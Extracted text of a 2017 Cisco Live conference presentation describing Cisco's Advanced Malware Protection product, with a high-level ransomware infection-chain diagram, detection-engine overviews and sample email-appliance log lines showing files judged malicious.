advanced malware protection - safeplus live berlin 2017/brkse… · advanced malware protection...

Advanced Malware Protection

Cisco Advanced Malware Protection [AMP] is designed toprovide both defense and insight Before, During, and After thesebreach attempts. If you have struggled with point of exposure, orthe extent of breach, this session will show how Cisco AMPhelps to detect infections, understand scope, and initiateremediation for protected systems no matter where they are atany moment.

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public

Me …

Ivan BERLINSON

CISCO Advanced Threat Solutions

Southern Europe Security Engineer

Based in France

[email protected]

BRKSEC-2139 3

mailto:[email protected]


DOES IT

PROTRECT THEIR CREDIT CARD

ACCOUNT?

Yes No

BRKSEC-2139 4

“Visibility Everywhere and Continuous Monitoring is the Key !”

• Some facts about Malware

• How AMP helps with Malware Prevention

• Prevention alone is not enough – Go further with Detection and Remediation

• How AMP works (Demonstration)

• Q&A

Today we will talk about

• AMP Setup and Threat Grid integration

• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security

• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)

• CTA Details

• BRKSEC-2444 CTA - Detecting advanced malware with machine learning

Today we will NOT talk about


Permanent Innovation makes Prevention a Non Ending Game

1. Cyber Criminal Organizations are like IT companies

2. Security companies innovate Every Day to Protect youBetter

3. Cyber Criminals innovate Every Day to Breach youBetter

BRKSEC-2139 8


And thanks to Financial efficiency, hackers can innovate every day

- Locky’s victims per day* : 90,000 - Average ransom : .5 BTC < > 1 BTC

- Ransom Paid** : 2.9% of victims

1,093,590 $

/ DAY

32,807,700 $

/ MONTH

393,892,400 $

/ YEAR

*Forbes **TALOS Angler Exposer Research

V1 .locky V2 .zepto V3 .odinDridex

20162015

BRKSEC-2139 9


Like multiple obfuscation hiding malicious behavior from Point in Time protection systems

Receipt_123412

.doc

XOR encoded

Payload

Base64 encoded

payload

Packed PE32

VBA

Launches

Explorer.exe

Unpacked and Executed

by WinWord

DLL

Dropped

UAC BypassKill & Disable

Services

Information

Stealing

Encrypt C&C

communication RC4

Drop & Execute

Dridex Payload

Launches

Calc.exe

DLL

Dropped

Encrypt Regular

Files

Leave How-To decrypt

instructionsDisabling System Recovery /

Backup deletion

Self-Propagation /

Lateral Movement

BRKSEC-2139 10


And if Phase 1 is a success, then add new functions for more benefits

Receipt_123412

.doc

XOR encoded

Payload

Base64 encoded

payload

Packed PE32

VBA

Launches

Explorer.exe

Unpacked and Executed

by WinWord

DLL

Dropped

UAC BypassKill & Disable

Services

Information

Stealing

Encrypt C&C

communication RC4

Drop & Execute

Dridex Payload

Launches

Calc.exe

DLL

Dropped

Encrypt Regular

Files

Leave How-To decrypt

instructionsDisabling System Recovery /

Backup deletion

Self-Propagation /

Lateral Movement

BRKSEC-2139 11


Malware is getting in. Prevention tools ALONE will never catch everything

Initial Disposition = Clean Actual Disposition = Bad

Too Late!!

Blind to

scope of

compromise

AV

IPS

<65%AV Efficacy

Rate

Sleep Techniques

Unknown Protocols

Encryption

Polymorphism

Analysis Stops

Init

ial In

sp

ecti

on

BRKSEC-2139 12


HostWebEmailNetwork Attached Controls

Advanced Malware Protection - Unified By Threat

ISRNGIPS NGFW Meraki MX ESA CES WSA CWS Endpoint

AMP Cloud

File

Metadata

BRKSEC-2139 14


1-to-1 Signatures

• SHA-256

• Cloud-Enabled Coverage

• Full Signature Database Protection

Data

Data

Feature Vectors

Machine

Learning

Algorithm

Predictive

Model

Decision

Trees

Hypothesis

Disposition Featureprint

LabelsPerformance

Monitoring

Clean

Unknown

Malware

Custome

r

Data

Spero Engine*

Ethos Engine**

• Generic Signature Engine

• Polymorphic variants of a threat

• Machine Learning

• Makes Predictions based on

Applications Features

*Network and Endpoint Only

**Endpoint Only

For YourReference

BRKSEC-2139 15




TI Database

Static & Dymanic

Analysis

Threat Grid

AMP Cloud

File

Metadata

Threat Score


BRKSEC-2139 16


Dynamic Analysis Engine – Cisco Threat Grid

• Unified Malware Analysis And TIP

• Proprietary Static And Dynamic Analysis,

• Human Readable Behavior Indicators

• Samples Correlated With Billions Of Artifacts

• Global / Historical Context On Threat Landscape

• Threat Intelligence Feeds

BRKSEC-2139 17




TI Database

Static & Dymanic

Analysis

Threat Grid

AMP Cloud

File

Metadata

Threat Score


BRKSEC-2139 18


Retrospective Engine

File Reputation Query

Response Disposition

Retrospective Queue

Last 7 days / Every

Hour

Changed Disposition

Retrospective Query (20mn)

SHA, SPERO, ETHOS,

DFC

Real Time

AMP

Threat Grid

BRKSEC-2139 19




TI Database

Static & Dymanic

Analysis

Threat Grid

AMP Cloud

Cognitive

Threat Analytics

ISE

OpenDNS

Umbrella

File

Metadata

Threat Score


BRKSEC-2139 20


RET Report December 2016 Total Detections

75%

35%

75%

36%

57%

33%

63%

32%

-

1,000,000.00

2,000,000.00

3,000,000.00

4,000,000.00

5,000,000.00

6,000,000.00

Total ThreatGrid Talos Third Party Others

December 2016

Total 5 322 833

Threat Grid 110 289

Talos 1 299 961

Third Party 3 834 207

Others 78 376

For YourReference


• Block by AMP File Reputation

• Block by AMP Dynamic File Analysis

• Detect by AMP Retrospection.

Demonstration AMP on ESA

BRKSEC-2139 23


Endpoint Detection and Response (EDR)

• Detect security incidents

• Contain the incident at the endpoint, such that network traffic or process execution can be remotely controlled

• Investigate security incidents

• Remediate endpoints.

http://blogs.cisco.com/security/endpoint-protection-platform-epp-vs-endpoint-detection-response-edr

Continuous Monitoring and Event Recording

Visibility and Remote Control on Endpoint

BRKSEC-2139 25

http://blogs.cisco.com/security/endpoint-protection-platform-epp-vs-endpoint-detection-response-edr


To investigate a Breach, you need to answer Urgent Questions.

Indications of Compromise to detect/block the Breach (100+) :

• Vulnerability Assessment

• Behavioral Analysis

• Reputation Check

• Low Prevalence

• Dynamic Analysis

• Command Line Capture

• Tetra AV Engine

Adobe Reader / Word / Powerpoint / Excel

/ QuickTime / Java etc. Compromise

Threat

ExecutedThreat

Quarantined

Potentia

l

Dropper

Pwrshell Downloaded

Executable

Possible Ransomware Shadow Copy

Deletion

Netsh Firewall

Disable

Is there a Breach and

What Happened ?

More Than 100 Behaviors Monitored !

BRKSEC-2139 26



What Happened ?

Device Flow Correlation [DFC]

Timestamp

DeviceIP/Port/Protocol

DestinationIP/Port/Protocol

URLs / Domains

File downloads

• Cisco provided

Intelligence

• Custom–defined lists

• Real Time

Alerts or Blocks / Terminate Process

Cognitive threat Analytics [CTA]

Cisco WSA, Cisco CWS and Bluecoat logs processing


BRKSEC-2139 27



What Happened ?

Where Did The Malware Come

From and Where has it been


BRKSEC-2139 28



What Happened ?




BRKSEC-2139 29



What Happened ?



What Is It

Doing?


BRKSEC-2139 30



What Happened ?



What Is It

Doing?


BRKSEC-2139 31


And you need to Remediate


What Happened ?



What Is It

Doing?How Do We

Stop It?

Granular Remediation and remote control

• Simple Hash Block

• Advanced Signature (Clamav)

• Application Blocking

• Network Communication Blocking

• Host Isolation

• Network/Vlan isolation

• Host/User privilege revocation

BRKSEC-2139 32


AMP on Endpoints

Malicious Behaviors detected on an Endpoint

Investigation and Remediation

BRKSEC-2139 34


Complete Your Online Session Evaluation

Don’t forget: Cisco Live sessions will be available for viewing on-demand after the event at CiscoLive.com/Online

• Please complete your Online Session Evaluations after each session

• Complete 4 Session Evaluations & the Overall Conference Evaluation (available from Thursday) to receive your Cisco Live T-shirt

• All surveys can be completed via the Cisco Live Mobile App or the Communication Stations

BRKSEC-2139 36

CiscoLive.com/Online


Continue Your Education

• Lunch & Learn

• Meet the Engineer 1:1 meetings

• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security

• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)

• BRKSEC-2444 Detecting advanced malware with machine learning

BRKSEC-2139 37

Thank You

“Logic will get you from point A to B,

Imagination will take you Everywhere”

- Albert Einstein

Demo Screenshots


• Block by AMP File Reputation

• Block by AMP Dynamic File Analysis

• Detect by AMP Retrospection.

Demonstration AMP on ESA

BRKSEC-2139 41


• Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 1

• Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, file name: neup.exe

• Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, File name: neup.exe, Disposition: 3 Score: 95, Spyname:[W32.E05774DA61-95.SBX.TG]

• Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 2

• Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.E05774DA61-95.SBX.TG

BRKSEC-2139 53


• Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…, upload_action = 1

• Tue Feb 14 10:42:10 2017 Info: File uploaded for analysis. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, file name: spoolup8.exe

• Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, File name: spoolup8.exe, Disposition: 1 Score: 56,

• Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…., upload_action = 2

• Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a….., Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.94D523DC03-73.SBX.VIOC

BRKSEC-2139 56


AMP on Endpoints

Malicious Behaviors detected on an Endpoint

Investigation and Remediation

BRKSEC-2139 57

advanced malware protection - safeplus live berlin 2017/brkse… · advanced malware protection...

Documents